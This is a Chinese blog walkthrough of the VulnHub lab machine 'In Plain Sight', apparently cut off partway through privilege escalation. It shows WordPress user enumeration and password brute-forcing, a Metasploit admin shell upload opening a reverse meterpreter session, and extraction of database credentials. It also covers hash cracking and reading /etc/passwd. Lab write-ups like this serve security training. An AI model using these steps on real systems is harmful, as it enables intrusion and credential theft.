vulnhub靶机渗透[In-Plain-Sight-1-0-1]

Posted on Edited on In Views: Word count in article: 4.7k Reading time ≈ 17 mins.

名称

名称:In Plain Sight: 1.0.1
发布日期:2019年12月2日

下载

  • Download: https://drive.google.com/file/d/19BZkANMJDL421KkiHVePlzc3Oa3wwzHU/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/inplainsight/inplainsight1.ova
  • Download (Torrent): https://download.vulnhub.com/inplainsight/inplainsight1.ova.torrent

描述

级别:初学者-中级
说明:使用VirtualBox构建/测试。启用DHCP。需要root才能读取flag

  • Changelog 2019-12-02:v1.0.1 2019-11-22:v1.0

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.108
Host is up (0.00027s latency).
MAC Address: 08:00:27:48:A5:6E (Oracle VirtualBox virtual NIC)
1
2
3
4
5
root@kali:~# nmap -p- -v -sV -Pn 192.168.56.108
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# ftp 192.168.56.108
Connected to 192.168.56.108.
220 IPS Corp
Name (192.168.56.108:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           306 Nov 22 13:42 todo.txt
226 Directory send OK.
ftp> cat todo.txt
?Invalid command
ftp> get todo.txt
local: todo.txt remote: todo.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for todo.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.02 secs (14.9999 kB/s)
ftp> quit
221 Goodbye.
1
2
3
4
5
6
7
8
root@kali:~# cat todo.txt 
mike - please get ride of that worthless wordpress instance! it's a security ris
k.  if you have privilege issues, please ask joe for assitance.

joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.

- boss person

没有什么有用的信息,继续寻找敏感信息

注意是index.htnl,打开此页面,随便点击一个地方

出现如下的上传页面

可以看到,该网页允许上传任何图像。因此,这里尝试上传图像,但成功了,但是当尝试上传.php文件时,网页给了一个错误。在进一步探索之后,该网页的URL引起了注意,可以看到它看起来像一个hash,因此我们将其复制并尝试使用john对其进行破解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# john pass
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
goodluck         (?)
1g 0:00:00:00 DONE 2/3 (2020-01-12 20:31) 20.00g/s 3680p/s 3680c/s 3680C/s emily..iceman
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

john破解hash的结果是:goodluck
在这一点上,我们只是被拖钓了。然后,我们尝试上传一个简单的.php文件,而在上传.php文件时,我们遇到以下错误:

但是这个错误导致我们进入了新页面“upload.php”。让我们检查此页面的源代码

1
<!--ZmxvY2NpbmF1Y2luaWhpbGlwaWxpZmljYXRpb24K-->

源代码末尾有一个注释。这是base64编码的文本,因此,使用以下命令对其进行解码:

1
2
root@kali:~# echo ZmxvY2NpbmF1Y2luaWhpbGlwaWxpZmljYXRpb24K | base64 -d
floccinaucinihilipilification

不知道为什么这里解密字符串和结果和别人的walkthrough不一样,别人的是c28tZGV2LXdvcmRwcmVzcw==,解密出来是so-dev-wordpress

文本解码后,看起来像目录或网页。但是在探索之前,先看看是否有更多的页面。因此,使用dirbuster。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
root@kali:~# dirb http://192.168.56.108/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jan 12 20:42:40 2020
URL_BASE: http://192.168.56.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.108/ ----
+ http://192.168.56.108/index.html (CODE:200|SIZE:10918)                                              
+ http://192.168.56.108/info.php (CODE:200|SIZE:84111)                                                
+ http://192.168.56.108/server-status (CODE:403|SIZE:279)                                             
==> DIRECTORY: http://192.168.56.108/wordpress/                                                       
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/ ----
+ http://192.168.56.108/wordpress/index.php (CODE:301|SIZE:0)                                         
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/                                              
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/                                            
==> DIRECTORY: http://192.168.56.108/wordpress/wp-includes/                                           
+ http://192.168.56.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                       
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-admin/ ----
+ http://192.168.56.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/css/                                          
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/images/                                       
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/includes/                                     
+ http://192.168.56.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/js/                                           
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/maint/                                        
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/network/                                      
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/user/                                         
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-content/ ----
+ http://192.168.56.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)                              
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/plugins/                                    
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/themes/                                     
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-admin/network/ ----
+ http://192.168.56.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                        
+ http://192.168.56.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                        
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-admin/user/ ----
+ http://192.168.56.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                           
+ http://192.168.56.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                           
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-content/plugins/ ----
+ http://192.168.56.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                      
                                                                                                      
---- Entering directory: http://192.168.56.108/wordpress/wp-content/themes/ ----
+ http://192.168.56.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

有很多页面,结果显示CMS是wordpress,因此,可以使用wpscan浏览提到wordpress的两个指定页面。为此,请使用以下命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
root@kali:~# wpscan --url http://192.168.56.108/wordpress/ --enumerate
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.56.108/wordpress/
[+] Started: Sun Jan 12 20:45:08 2020

Interesting Finding(s):

[+] http://192.168.56.108/wordpress/
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.108/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.108/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.56.108/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3 identified (Insecure, released on 2019-11-12).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.108/wordpress/, Match: 'WordPress 5.3'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:00 <=======================> (320 / 320) 100.00% Time: 00:00:00

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:01 <=====================> (2568 / 2568) 100.00% Time: 00:00:01

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==========================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <==============================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:00 <===================> (100 / 100) 100.00% Time: 00:00:00

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] bossperson
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sun Jan 12 20:45:16 2020
[+] Requests Done: 3094
[+] Cached Requests: 4
[+] Data Sent: 840.6 KB
[+] Data Received: 567.645 KB
[+] Memory used: 183.743 MB
[+] Elapsed time: 00:00:07

得到user为bossperson,同样,让枚举另一页。

1
2
3
4
5
root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ -U bossperson -P /usr/share/wordlists/dirb/common.txt
[+] Performing password attack on Wp Login against 1 user/s
Trying bossperson / zoom Time: 00:00:27 <========================> (4614 / 4614) 100.00% Time: 00:00:27

[i] No Valid Passwords Found.

找不到任何密码,但是不用担心,因为可以在另一页上运行相同的命令,请输入以下内容进行尝试:

1
2
3
4
5
6
7
8
9
10
root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ --enumerate
[i] User(s) Identified:

[+] mike
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

找到用户名之后,运行下面的命令爆破密码:

1
2
3
4
5
6
7
root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ -U admin,mike -P /usr/share/wordlists/dirb/common.txt
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - admin / admin1                                                                             
Trying mike / zope Time: 00:00:36 <==============================> (4914 / 4914) 100.00% Time: 00:00:36

[i] Valid Combinations Found:
 | Username: admin, Password: admin1

getshell

得到admin/admin1,终于找到了用户admin的密码。现在,使用msfconsole上传shell。通过Metasploit,使用exploit/unix/webapp/wp_admin_shell_upload。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
root@kali:~# msfdb run
[+] Starting database
                                                  

  Metasploit Park, System Security Interface                                                           
  Version 4.0.5, Alpha E                                                                               
  Ready...                                                                                             
  > access security                                                                                    
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       
  YOU DIDN'T SAY THE MAGIC WORD!                                                                       


       =[ metasploit v5.0.68-dev                          ]
+ -- --=[ 1957 exploits - 1093 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set Pa
set PaSSWORD  set PaYLOAD   
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PA
set PASSWORD  set PAYLOAD   
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin1
PASSWORD => admin1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.56.108
rhost => 192.168.56.108
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGET
set TARGET     set TARGETURI  
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /so-dev-wordpress
TARGETURI => /so-dev-wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Authenticating with WordPress using admin:admin1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /so-dev-wordpress/wp-content/plugins/RnhGIdzuxq/oElblRDrKY.php...
[*] Sending stage (38288 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.108:60668) at 2020-01-12 22:03:59 -0500
[+] Deleted oElblRDrKY.php
[+] Deleted RnhGIdzuxq.php
[+] Deleted ../RnhGIdzuxq

meterpreter > id
[-] Unknown command: id.
meterpreter > sysinfo
Computer    : inplainsight
OS          : Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64
Meterpreter : php/linux

成功使用msf拿到了shell,获得标准输出的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > shell
Process 1396 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
whoami
www-data

探索

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
$ ls
ls
$ pwd
pwd

$ pwd
pwd

$ cd ..
cd ..
$ ls
ls
akismet  hello.php  index.php
$ pwd
pwd
/var/www/html/so-dev-wordpress/wp-content/plugins
$ 

$ cd ../..
cd ../..
$ ls
ls
index.php        wp-blog-header.php    wp-cron.php        wp-mail.php
license.txt      wp-comments-post.php  wp-includes        wp-settings.php
readme.html      wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php  wp-config.php         wp-load.php        wp-trackback.php
wp-admin         wp-content            wp-login.php       xmlrpc.php
$ pwd
pwd
/var/www/html/so-dev-wordpress
$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'b_P>20/J+HW!D1-[XI1~~abSjE~8do)Rp]jt/~Q0s-6/!U,Norv{.+1xOh5+gnPr' );
define( 'SECURE_AUTH_KEY',  'nbfna5q3cP5/Gfaa`H`4{SklZTx+inPmf*uh!boz=K`bUSldsl?m`-{0FZ9Kdw4$' );
define( 'LOGGED_IN_KEY',    'UC8f4{^Z[9co/>[n*opw @Dtss(?~[dBQ/Xtbm8&/rx1{=Y^obQY`DE7ZYmHwSQT' );
define( 'NONCE_KEY',        'Z)O2rZ_IT6fNshPKa^RB:2?EU%a|tV91z,mWU$rfsoFnbUVKp4l;+z lrN4~T(9h' );
define( 'AUTH_SALT',        ']C-xQeq^*m$$yt:oLqg>b?+teMLO7~<#|j@(n/K~L!4 n{UCp%|$;;[_@6u]PHxT' );
define( 'SECURE_AUTH_SALT', '(rtGT9%Jv uX95E&!tdiTZ7X19u:ak_B_L@YOeRq6eLf.bWV{7|0Kn2JjOmk~[~l' );
define( 'LOGGED_IN_SALT',   '1cC3onJs2/0; 5R91DS]m>i|-P1<SaQqUN3Lg`u|4{]aH826Fnt*,[RY?{y0JGeG' );
define( 'NONCE_SALT',       '6a?qf^w0Q1D{%!Y_HIO&#Kc-p19/p8~#*Zo~6NHyZqSgL7ws6=Vdg|*Hijk<7T4{' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'sodevwp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

现在有了数据库用户名和密码:

1
2
3
4
5
6
7
8
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
www-data@inplainsight:/var/www/html/so-dev-wordpress$ mysql -usodevwp -poZ2R3c2x7dLL6#hJ
<o-dev-wordpress$ mysql -usodevwp -poZ2R3c2x7dLL6#hJ  
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 9805
Server version: 10.3.20-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sodevwp            |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use sodevwp;
use sodevwp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [sodevwp]> show tables;
show tables;
+----------------------------+
| Tables_in_sodevwp          |
+----------------------------+
| sodevwp_commentmeta        |
| sodevwp_comments           |
| sodevwp_links              |
| sodevwp_options            |
| sodevwp_postmeta           |
| sodevwp_posts              |
| sodevwp_term_relationships |
| sodevwp_term_taxonomy      |
| sodevwp_termmeta           |
| sodevwp_terms              |
| sodevwp_usermeta           |
| sodevwp_users              |
+----------------------------+
12 rows in set (0.000 sec)

MariaDB [sodevwp]> select * from sodevwp_users;
select * from sodevwp_users;
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA. | admin         | admin@local.lan |          | 2019-11-22 03:41:57 |                     |           0 | admin        |
|  2 | mike       | $P$B3halPOgh4jqI1tDelkv5TGAHnaOC01 | mike          | mike@local.lan  |          | 2019-11-22 03:44:25 |                     |           0 | mike         |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.001 sec)

成功使用上述命令后,将发现以下两个hash值:

1
2
$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.(admin)
$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01(mike)

将2条hash值保存后,用hashcat破解如下所示,电脑是GTX-1070 8GB显存的显卡,一秒出密码,非常给力,比用john破解快多了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 400 password.txt D:/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: Intel's OpenCL runtime (GPU only) is currently broken.
             We are waiting for updated OpenCL drivers from Intel.
             You can use --force to override, but do not report related errors.
* Device #3: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlInit(): Unknown Error

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) UHD Graphics 630, skipped.
* Device #2: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

OpenCL Platform #2: NVIDIA Corporation
======================================
* Device #3: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: D:/wordlists/rockyou.txt
* Passwords.: 14344360
* Bytes.....: 139921318
* Keyspace..: 14344360

$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01:skuxdelux
$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.:admin1

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: password.txt
Time.Started.....: Mon Jan 13 11:20:12 2020 (2 secs)
Time.Estimated...: Mon Jan 13 11:20:14 2020 (0 secs)
Guess.Base.......: File (D:/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#3.........:  1199.8 kH/s (6.61ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 1048576/28688720 (3.66%)
Rejected.........: 0/1048576 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:8064-8192
Candidates.#3....: 123456 -> chadj85
Hardware.Mon.#3..: N/A

Started: Mon Jan 13 11:20:09 2020
Stopped: Mon Jan 13 11:20:15 2020

得到两个密码:
admin/admin1
mike/skuxdelux

现在,将用户切换为Mike,可以如下观察到可以成功完成操作,这意味着破解密码成功。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@inplainsight:/var/www/html/so-dev-wordpress$ su admin
su admin
su: user admin does not exist
www-data@inplainsight:/var/www/html/so-dev-wordpress$ 

www-data@inplainsight:/var/www/html/so-dev-wordpress$ su mike
su mike
Password: skuxdelux

mike@inplainsight:/var/www/html/so-dev-wordpress$ id
id
uid=1000(mike) gid=1000(mike) groups=1000(mike)
mike@inplainsight:/var/www/html/so-dev-wordpress$ whoami
whoami
mike

提权

继续进行特权升级。现在,当您将目录更改为/home时,会发现一个新用户“joe”并且不浪费任何时间,我们遍历了/etc/passwd。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
mike@inplainsight:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
